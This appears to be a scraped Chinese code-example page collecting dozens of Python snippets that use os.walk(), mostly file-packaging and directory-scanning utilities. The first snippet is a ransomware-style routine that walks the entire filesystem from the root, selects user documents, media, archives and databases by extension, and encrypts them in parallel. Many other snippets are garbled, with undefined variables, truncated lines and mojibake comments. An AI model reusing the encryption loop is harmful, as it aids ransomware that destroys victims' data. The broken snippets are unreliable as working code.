Python os 模块,walk() 实例源码
我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用os.walk()。
def select_files():
ext = [".3g2", ".3gp", ".asf", ".asx", ".avi", ".flv",
".m2ts", ".mkv", ".mov", ".mp4", ".mpg", ".mpeg",
".rm", ".swf", ".vob", ".wmv" ".docx", ".pdf",".rar",
".jpg", ".jpeg", ".png", ".tiff", ".zip", ".7z", ".exe",
".tar.gz", ".tar", ".mp3", ".sh", ".c", ".cpp", ".h",
".gif", ".txt", ".py", ".pyc", ".jar", ".sql", ".bundle",
".sqlite3", ".html", ".PHP", ".log", ".bak", ".deb"]
files_to_enc = []
for root, dirs, files in os.walk("/"):
for file in files:
if file.endswith(tuple(ext)):
files_to_enc.append(os.path.join(root, file))
# Parallelize execution of encryption function over four subprocesses
pool = Pool(processes=4)
pool.map(single_arg_encrypt_file, files_to_enc)
def zipdir(archivename, basedir):
'''Zip directory,from J.F. Sebastian http://stackoverflow.com/'''
assert os.path.isdir(basedir)
with closing(ZipFile(archivename, "w", ZIP_DEFLATED)) as z:
for root, files in os.walk(basedir):
#NOTE: ignore empty directories
for fn in files:
if fn[-4:]!='.zip':
absfn = os.path.join(root, fn)
zfn = absfn[len(basedir)+len(os.sep):] #XXX: relative path
z.write(absfn, zfn)
# ================ Inventory input data and create data structure =================
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, "w") as zf:
for root, files in os.walk(directory):
for name in files:
full = os.path.join(root, name)
rel = root[dlen:]
dest = os.path.join(rel, name)
zf.write(full, dest)
return result
#
# Simple progress bar
#
def load_data(self):
# work in the parent of the pages directory,because we
# want the filenames to begin "pages/...".
chdir(dirname(self.setup.pages_dir))
rel = relpath(self.setup.pages_dir)
for root, files in walk(rel):
for filename in files:
start, ext = splitext(filename)
if ext in self.setup.data_extensions:
#yield root,dirs,filename
loader = self.setup.data_loaders.get(ext)
path = join(root,filename)
if not loader:
raise SetupError("Identified data file '%s' by type '%s' but no loader found" % (filename, ext))
data_key = join(root, start)
loaded_dict = loader.loadf(path)
self.data[data_key] = loaded_dict
#self.setup.log.debug("data key [%s] ->" % (data_key,),root,filename,); pprint.pprint(loaded_dict,sys.stdout)
#pprint.pprint(self.data,sys.stdout)
#print("XXXXX data:",self.data)
def prepare_zip():
from pkg_resources import resource_filename as resource
from config import config
from json import dumps
logger.info('creating/updating gimel.zip')
with ZipFile('gimel.zip', 'w', ZIP_DEFLATED) as zipf:
info = ZipInfo('config.json')
info.external_attr = 0o664 << 16
zipf.writestr(info, dumps(config))
zipf.write(resource('gimel', 'config.py'), 'config.py')
zipf.write(resource('gimel', 'gimel.py'), 'gimel.py')
zipf.write(resource('gimel', 'logger.py'), 'logger.py')
for root, files in os.walk(resource('gimel', 'vendor')):
for file in files:
real_file = os.path.join(root, file)
relative_file = os.path.relpath(real_file,
resource('gimel', ''))
zipf.write(real_file, relative_file)
def zipdir(path, zipn):
for root, files in os.walk(path):
for file in files:
zipn.write(os.path.join(root, file))
def gen_data_files(src_dir):
"""
generates a list of files contained in the given directory (and its
subdirectories) in the format required by the ``package_data`` parameter
of the ``setuptools.setup`` function.
Parameters
----------
src_dir : str
(relative) path to the directory structure containing the files to
be included in the package distribution
Returns
-------
fpaths : list(str)
a list of file paths
"""
fpaths = []
base = os.path.dirname(src_dir)
for root, dir, files in os.walk(src_dir):
if len(files) != 0:
for f in files:
fpaths.append(os.path.relpath(os.path.join(root, f), base))
return fpaths
def clearpyc(root, patterns='*',single_level=False, yield_folders=False):
"""
root: ??¼
patterns ???????
single_level: ???¼??
yield_folders: ??¼??
"""
patterns = patterns.split(';')
for path, subdirs, files in os.walk(root):
if yield_folders:
files.extend(subdirs)
files.sort()
for name in files:
for pattern in patterns:
if fnmatch.fnmatch(name, pattern.strip()):# ?pattern???
yield os.path.join(path, name)
if single_level:
break
def get_distribution_names(self):
"""
Return all the distribution names kNown to this locator.
"""
result = set()
for root, files in os.walk(self.base_dir):
for fn in files:
if self.should_include(fn, root):
fn = os.path.join(root, fn)
url = urlunparse(('file', '',
pathname2url(os.path.abspath(fn)),
'', ''))
info = self.convert_url_to_download_info(url, None)
if info:
result.add(info['name'])
if not self.recursive:
break
return result
def test_pydist():
"""Make sure pydist.json exists and validates against our schema."""
# XXX this test may need manual cleanup of older wheels
import jsonschema
def open_json(filename):
return json.loads(open(filename, 'rb').read().decode('utf-8'))
pyMeta_schema = open_json(resource_filename('wheel.test',
'pydist-schema.json'))
valid = 0
for dist in ("simple.dist", "complex-dist"):
basedir = pkg_resources.resource_filename('wheel.test', dist)
for (dirname, filenames) in os.walk(basedir):
for filename in filenames:
if filename.endswith('.whl'):
whl = ZipFile(os.path.join(dirname, filename))
for entry in whl.infolist():
if entry.filename.endswith('/Metadata.json'):
pyMeta = json.loads(whl.read(entry).decode('utf-8'))
jsonschema.validate(pyMeta, pyMeta_schema)
valid += 1
assert valid > 0, "No Metadata.json found"
def get_all_pages(self):
# work in the parent of the pages directory,because we
# want the filenames to begin "pages/...".
chdir(dirname(self.setup.pages_dir))
rel = relpath(self.setup.pages_dir)
for root, files in walk(rel): # self.config.pages_dir):
# examples:
#
# root='pages' root='pages/categories'
# dirs=['categories'] dirs=[]
# files=['index.html'] files=['list.html']
# self.setup.log.debug("\nTEMPLATE ROOT: %s" % root)
# self.setup.log.debug("TEMPLATE Dirs: %s" % dirs)
# self.setup.log.debug("TEMPLATE FILENAMES: %s" % files)
# #dir_context = global_context.new_child(data_tree[root])
for filename in files:
start, ext = splitext(filename)
if ext in self.setup.template_extensions:
# if filename.endswith(".html"): # Todo: should this filter be required at all?
yield Page(self.setup, filename, join(root, filename))
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, dest)
return result
#
# Simple progress bar
#
def unpack_directory(filename, extract_dir, progress_filter=default_filter):
""""Unpack" a directory,using the same interface as for archives
Raises ``UnrecognizedFormat`` if `filename` is not a directory
"""
if not os.path.isdir(filename):
raise UnrecognizedFormat("%s is not a directory" % filename)
paths = {
filename: ('', extract_dir),
}
for base, files in os.walk(filename):
src, dst = paths[base]
for d in dirs:
paths[os.path.join(base, d)] = src + d + '/', os.path.join(dst, d)
for f in files:
target = os.path.join(dst, f)
target = progress_filter(src + f, target)
if not target:
# skip non-files
continue
ensure_directory(target)
f = os.path.join(base, f)
shutil.copyfile(f, target)
shutil.copystat(f, target)
def find_problems(problem_path):
"""
Find all problems that exist under the given root.
We consider any directory with a problem.json to be an intended problem directory.
Args:
problem_path: the problem directory
Returns:
A list of problem paths returned from get_problem.
"""
problem_paths = []
for root, _, files in os.walk(problem_path):
if "problem.json" in files and "__staging" not in root:
problem_paths.append(root)
return problem_paths
def files_from_directory(directory, recurse=True, permissions=0o664):
"""
Returns a list of File objects for every file in a directory. Can recurse optionally.
Args:
directory: The directory to add files from
recurse: Whether or not to recursively add files. Defaults to true
permissions: The default permissions for the files. Defaults to 0o664.
"""
result = []
for root, dirnames, filenames in os.walk(directory):
for filename in filenames:
result.append(File(join(root, filename), permissions))
if not recurse:
break
return result
def get_unignored_file_paths(cls, ignore_list=None, white_list=None):
config = cls.get_config()
ignore_list = ignore_list or config[0]
white_list = white_list or config[1]
unignored_files = []
for root, files in os.walk("."):
logger.debug("Root:%s,Dirs:%s", root, dirs)
if cls._ignore_path(unix_style_path(root), ignore_list, white_list):
dirs[:] = []
logger.debug("Ignoring directory : %s", root)
continue
for file_name in files:
file_path = unix_style_path(os.path.join(root, file_name))
if cls._ignore_path(file_path, white_list):
logger.debug("Ignoring file : %s", file_name)
continue
unignored_files.append(os.path.join(root, file_name))
return unignored_files
def __processDir(self):
"""
Looks for Makefiles in the given directory and all the sub-directories
if recursive is set to true
"""
self.__log("Processing directory %s" % self.__tgt)
# if recurse,then use walk otherwise do current directory only
if self.__recurse:
for (path, files) in os.walk(self.__tgt):
for curr_file in files:
# if the file is a Makefile added to process
if curr_file == __PATTERN__:
fname = os.path.join(path, curr_file)
self.__make_files.append(fname)
self.__log("Adding %s to list" % fname)
else:
# just care to find Makefiles in this directory
files = os.listdir(self.__tgt)
if __PATTERN__ in files:
fname = os.path.join(self.__tgt, __PATTERN__)
self.__log("Appending %s to the list" % fname)
self.__make_files.append(fname)
def get_sqls(self):
"""This function extracts sqls from the java files with mybatis sqls.
Returns:
A list of :class:`sql`. For example:
[sql('',u'select a.id,b.name from db.ac a join db.bc b on a.id=b.id or a.id=b.iid where a.cnt > 10')]
"""
sqls = []
for root, files in os.walk(self.dir):
for file in files:
if not file.endswith('.java'):
continue
with codecs.open(os.path.join(root, file), 'r', encoding=self.encoding) as f:
sqls.extend(MybatisInlinesqlExtractor.get_selects_from_text(MybatisInlinesqlExtractor.remove_comment(f.read())))
return sqls
def refactor_dir(self, dir_name, write=False, doctests_only=False):
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if (not name.startswith(".") and
os.path.splitext(name)[1] == py_ext):
fullname = os.path.join(dirpath, name)
self.refactor_file(fullname, write, doctests_only)
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def remove_folder(self, folder):
"""Delete the named folder,which must be empty."""
path = os.path.join(self._path, '.' + folder)
for entry in os.listdir(os.path.join(path, 'new')) + \
os.listdir(os.path.join(path, 'cur')):
if len(entry) < 1 or entry[0] != '.':
raise NotEmptyError('Folder contains message(s): %s' % folder)
for entry in os.listdir(path):
if entry != 'new' and entry != 'cur' and entry != 'tmp' and \
os.path.isdir(os.path.join(path, entry)):
raise NotEmptyError("Folder contains subdirectory '%s': %s" %
(folder, entry))
for root, files in os.walk(path, topdown=False):
for entry in files:
os.remove(os.path.join(root, entry))
for entry in dirs:
os.rmdir(os.path.join(root, entry))
os.rmdir(path)
def find_media_files(media_path):
unconverted = []
for dirname, directories, files in os.walk(media_path):
for file in files:
#skip hidden files
if file.startswith('.'):
continue
if is_video(file) or is_subtitle(file):
file = os.path.join(dirname, file)
#Skip Sample files
if re.search(".sample.",file,re.I):
continue
unconverted.append(file)
sorted_unconvered = sorted(unconverted)
return sorted_unconvered
def get_latest_data_subdir(pattern=None, take=-1):
def get_date(f):
return os.stat(os.path.join(BASE_data_dir, f)).st_mtime
try:
dirs = next(os.walk(BASE_data_dir))[1]
except stopiteration:
return None
if pattern is not None:
dirs = (d for d in dirs if pattern in d)
dirs = list(sorted(dirs, key=get_date))
if len(dirs) == 0:
return None
return dirs[take]
def garbage_collection():
global garbage_count, garbage_list
garbage_count = 0
garbage_list = ''
for root, targets in os.walk(media_path):
for target_name in targets:
if target_name.endswith(garbage):
garbage_count += 1
fullpath = os.path.normpath(os.path.join(str(root), str(target_name)))
garbage_list = garbage_list + "\n" + (str(garbage_count) + ': ' + fullpath)
os.remove(fullpath)
if garbage_count == 0:
print ("\nGarbage Collection: There was no garbage found!")
elif garbage_count == 1:
print ("\nGarbage Collection: The following file was deleted:")
else:
print ("\nGarbage Collection: The following " + str(garbage_count) + " files were deleted:")
print garbage_list
# Log varIoUs session statistics
def list_image(root, recursive, exts):
i = 0
if recursive:
cat = {}
for path, files in os.walk(root, followlinks=True):
dirs.sort()
files.sort()
for fname in files:
fpath = os.path.join(path, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
if path not in cat:
cat[path] = len(cat)
yield (i, os.path.relpath(fpath, root), cat[path])
i += 1
for k, v in sorted(cat.items(), key=lambda x: x[1]):
print(os.path.relpath(k, v)
else:
for fname in sorted(os.listdir(root)):
fpath = os.path.join(root, fname)
suffix = os.path.splitext(fname)[1].lower()
if os.path.isfile(fpath) and (suffix in exts):
yield (i, 0)
i += 1
def reseed(self, netdb):
"""Compress netdb entries and set content"""
zip_file = io.BytesIO()
dat_files = []
for root, files in os.walk(netdb):
for f in files:
if f.endswith(".dat"):
# Todo check modified time
# may be not older than 10h
dat_files.append(os.path.join(root, f))
if len(dat_files) == 0:
raise PyseederException("Can't get enough netDb entries")
elif len(dat_files) > 75:
dat_files = random.sample(dat_files, 75)
with ZipFile(zip_file, compression=ZIP_DEFLATED) as zf:
for f in dat_files:
zf.write(f, arcname=os.path.split(f)[1])
self.FILE_TYPE = 0x00
self.CONTENT_TYPE = 0x03
self.CONTENT = zip_file.getvalue()
self.CONTENT_LENGTH = len(self.CONTENT)
def QA_save_tdx_to_mongo(file_dir, client=QA_Setting.client):
reader = TdxMinBarReader()
__coll = client.quantaxis.stock_min_five
for a, v, files in os.walk(file_dir):
for file in files:
if (str(file)[0:2] == 'sh' and int(str(file)[2]) == 6) or \
(str(file)[0:2] == 'sz' and int(str(file)[2]) == 0) or \
(str(file)[0:2] == 'sz' and int(str(file)[2]) == 3):
QA_util_log_info('Now_saving ' + str(file)
[2:8] + '\'s 5 min tick')
fname = file_dir + '\\' + file
df = reader.get_df(fname)
df['code'] = str(file)[2:8]
df['market'] = str(file)[0:2]
df['datetime'] = [str(x) for x in list(df.index)]
df['date'] = [str(x)[0:10] for x in list(df.index)]
df['time_stamp'] = df['datetime'].apply(
lambda x: QA_util_time_stamp(x))
df['date_stamp'] = df['date'].apply(
lambda x: QA_util_date_stamp(x))
data_json = json.loads(df.to_json(orient='records'))
__coll.insert_many(data_json)
def zip_dir(directory):
"""zip a directory tree into a BytesIO object"""
result = io.BytesIO()
dlen = len(directory)
with ZipFile(result, dest)
return result
#
# Simple progress bar
#
def create_zipfile(self, filename):
zip_file = zipfile.ZipFile(filename, "w")
try:
self.mkpath(self.target_dir) # just in case
for root, files in os.walk(self.target_dir):
if root == self.target_dir and not files:
raise distutilsOptionError(
"no files found in upload directory '%s'"
% self.target_dir)
for name in files:
full = os.path.join(root, name)
relative = root[len(self.target_dir):].lstrip(os.path.sep)
dest = os.path.join(relative, name)
zip_file.write(full, dest)
finally:
zip_file.close()
def unpack_directory(filename,using the same interface as for archives
Raises ``UnrecognizedFormat`` if `filename` is not a directory
"""
if not os.path.isdir(filename):
raise UnrecognizedFormat("%s is not a directory" % (filename,))
paths = {filename:('',extract_dir)}
for base,dst = paths[base]
for d in dirs:
paths[os.path.join(base,d)] = src+d+'/',d)
for f in files:
name = src+f
target = os.path.join(dst,f)
target = progress_filter(src+f, target)
if not target:
continue # skip non-files
ensure_directory(target)
f = os.path.join(base,f)
shutil.copyfile(f, target)
def ensure_init(path):
'''
ensure directories leading up to path are importable,omitting
parent directory,eg path='/hooks/helpers/foo'/:
hooks/
hooks/helpers/__init__.py
hooks/helpers/foo/__init__.py
'''
for d, files in os.walk(os.path.join(*path.split('/')[:2])):
_i = os.path.join(d, '__init__.py')
if not os.path.exists(_i):
logging.info('Adding missing __init__.py: %s' % _i)
open(_i, 'wb').close()
def chownr(path, owner, group, follow_links=True, chowntopdir=False):
"""Recursively change user and group ownership of files and directories
in given path. Doesn't chown path itself by default,only its children.
:param str path: The string path to start changing ownership.
:param str owner: The owner string to use when looking up the uid.
:param str group: The group string to use when looking up the gid.
:param bool follow_links: Also Chown links if True
:param bool chowntopdir: Also chown path itself if True
"""
uid = pwd.getpwnam(owner).pw_uid
gid = grp.getgrnam(group).gr_gid
if follow_links:
chown = os.chown
else:
chown = os.lchown
if chowntopdir:
broken_symlink = os.path.lexists(path) and not os.path.exists(path)
if not broken_symlink:
chown(path, uid, gid)
for root, files in os.walk(path):
for name in dirs + files:
full = os.path.join(root, name)
broken_symlink = os.path.lexists(full) and not os.path.exists(full)
if not broken_symlink:
chown(full, gid)
def get_dir_size(start_path = '.'):
total_size = 0
for dirpath, filenames in os.walk(start_path):
for f in filenames:
fp = os.path.join(dirpath, f)
total_size += os.path.getsize(fp)
return total_size
def get_apk_file_in_path(path):
apk_map = []
for parent, dir_names, filenames in os.walk(path):
for f in filenames:
if f.endswith(Res.pgk_suffix):
apk_map.append(os.path.join(parent, f))
return apk_map
def list_images(dir):
r = []
for root, files in os.walk(dir):
for name in files:
if "jpg" in name or "mp4" in name:
r.append(os.path.join(root, name))
return r
# Load game IDs file
def package_files(directory):
"""Recursively add subfolders and files."""
paths = []
for (path, filenames) in os.walk(directory):
for filename in filenames:
paths.append(os.path.join('..', path, filename))
return paths
def maybe_load_scriptlets(cfg):
if scriptlets is not None:
return
global scriptlets
scriptlets = OrderedDict()
scriptlet_dir = os.path.join(cfg['assets'], 'scriptlets')
for root, files in os.walk(scriptlet_dir):
for filename in files:
contents = open(os.path.join(root, filename)).read()
m = re.search('_(.*)\.py', filename)
if m:
filename = m.group(1)
scriptlets[filename] = contents
def maybe_load_policies(cfg, policies_dict):
# Update policies_dict with files found in /src/assets/policies
policy_dir = os.path.join(cfg['assets'], 'policies')
for root, files in os.walk(policy_dir):
for filename in files:
contents = open(os.path.join(root, filename)).read()
policies_dict[filename] = contents
return policies_dict
def __init__(self, cfg):
static_dir = os.path.join(cfg['assets'], 'static')
self.files = {}
for root, files in os.walk(static_dir):
for filename in files:
if not filename.startswith('!'):
fullpath = os.path.join(root, filename)
self.files[filename] = File(fullpath)
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
for root, name)
if info:
self._update_version_data(result, info)
if not self.recursive:
break
return result
def _iglob(path_glob):
rich_path_glob = RICH_GLOB.split(path_glob, 1)
if len(rich_path_glob) > 1:
assert len(rich_path_glob) == 3, rich_path_glob
prefix, set, suffix = rich_path_glob
for item in set.split(','):
for path in _iglob(''.join((prefix, item, suffix))):
yield path
else:
if '**' not in path_glob:
for item in std_iglob(path_glob):
yield item
else:
prefix, radical = path_glob.split('**', 1)
if prefix == '':
prefix = '.'
if radical == '':
radical = '*'
else:
# we support both
radical = radical.lstrip('/')
radical = radical.lstrip('\\')
for path, files in os.walk(prefix):
path = os.path.normpath(path)
for fn in _iglob(os.path.join(path, radical)):
yield fn
def write_record(self, bdist_dir, distinfo_dir):
from wheel.util import urlsafe_b64encode
record_path = os.path.join(distinfo_dir, 'RECORD')
record_relpath = os.path.relpath(record_path, bdist_dir)
def walk():
for dir, files in os.walk(bdist_dir):
dirs.sort()
for f in sorted(files):
yield os.path.join(dir, f)
def skip(path):
"""Wheel hashes every possible file."""
return (path == record_relpath)
with open_for_csv(record_path, 'w+') as record_file:
writer = csv.writer(record_file)
for path in walk():
relpath = os.path.relpath(path, bdist_dir)
if skip(relpath):
hash = ''
size = ''
else:
with open(path, 'rb') as f:
data = f.read()
digest = hashlib.sha256(data).digest()
hash = 'sha256=' + native(urlsafe_b64encode(digest))
size = len(data)
record_path = os.path.relpath(
path, bdist_dir).replace(os.path.sep, '/')
writer.writerow((record_path, hash, size))
def test_no_scripts():
"""Make sure entry point scripts are not generated."""
dist = "complex-dist"
basedir = pkg_resources.resource_filename('wheel.test', dist)
for (dirname, filenames) in os.walk(basedir):
for filename in filenames:
if filename.endswith('.whl'):
whl = ZipFile(os.path.join(dirname, filename))
for entry in whl.infolist():
assert not '.data/scripts/' in entry.filename
def get_ext_outputs(self):
"""Get a list of relative paths to C extensions in the output distro"""
all_outputs = []
ext_outputs = []
paths = {self.bdist_dir: ''}
for base, files in os.walk(self.bdist_dir):
for filename in files:
if os.path.splitext(filename)[1].lower() in NATIVE_EXTENSIONS:
all_outputs.append(paths[base] + filename)
for filename in dirs:
paths[os.path.join(base, filename)] = (paths[base] +
filename + '/')
if self.distribution.has_ext_modules():
build_cmd = self.get_finalized_command('build_ext')
for ext in build_cmd.extensions:
if isinstance(ext, Library):
continue
fullname = build_cmd.get_ext_fullname(ext.name)
filename = build_cmd.get_ext_filename(fullname)
if not os.path.basename(filename).startswith('dl-'):
if os.path.exists(os.path.join(self.bdist_dir, filename)):
ext_outputs.append(filename)
return all_outputs, ext_outputs
def make_zipfile(zip_filename, base_dir, verbose=0, dry_run=0, compress=True,
mode='w'):
"""Create a zip file from all the files under 'base_dir'. The output
zip file will be named 'base_dir' + ".zip". Uses either the "zipfile"
Python module (if available) or the InfoZIP "zip" utility (if installed
and found on the default search path). If neither tool is available,
raises distutilsExecError. Returns the name of the output zip file.
"""
import zipfile
mkpath(os.path.dirname(zip_filename), dry_run=dry_run)
log.info("creating '%s' and adding '%s' to it", zip_filename, base_dir)
def visit(z, dirname, names):
for name in names:
path = os.path.normpath(os.path.join(dirname, name))
if os.path.isfile(path):
p = path[len(base_dir) + 1:]
if not dry_run:
z.write(path, p)
log.debug("adding '%s'", p)
compression = zipfile.ZIP_DEFLATED if compress else zipfile.ZIP_STORED
if not dry_run:
z = zipfile.ZipFile(zip_filename, mode, compression=compression)
for dirname, files in os.walk(base_dir):
visit(z, files)
z.close()
else:
for dirname, files in os.walk(base_dir):
visit(None, files)
return zip_filename
def add_output(self, path):
if os.path.isdir(path):
for base, files in os.walk(path):
for filename in files:
self.outputs.append(os.path.join(base, filename))
else:
self.outputs.append(path)
def _find_packages_iter(cls, where, exclude, include):
"""
All the packages found in 'where' that pass the 'include' filter,but
not the 'exclude' filter.
"""
for root, files in os.walk(where, followlinks=True):
# copy dirs to iterate over it,then empty dirs.
all_dirs = dirs[:]
dirs[:] = []
for dir in all_dirs:
full_path = os.path.join(root, dir)
rel_path = os.path.relpath(full_path, where)
package = rel_path.replace(os.path.sep, '.')
# Skip directory trees that are not valid packages
if ('.' in dir or not cls._looks_like_package(full_path)):
continue
# Should this package be included?
if include(package) and not exclude(package):
yield package
# Keep searching subdirectories,as there may be more packages
# down there,even if the parent was excluded.
dirs.append(dir)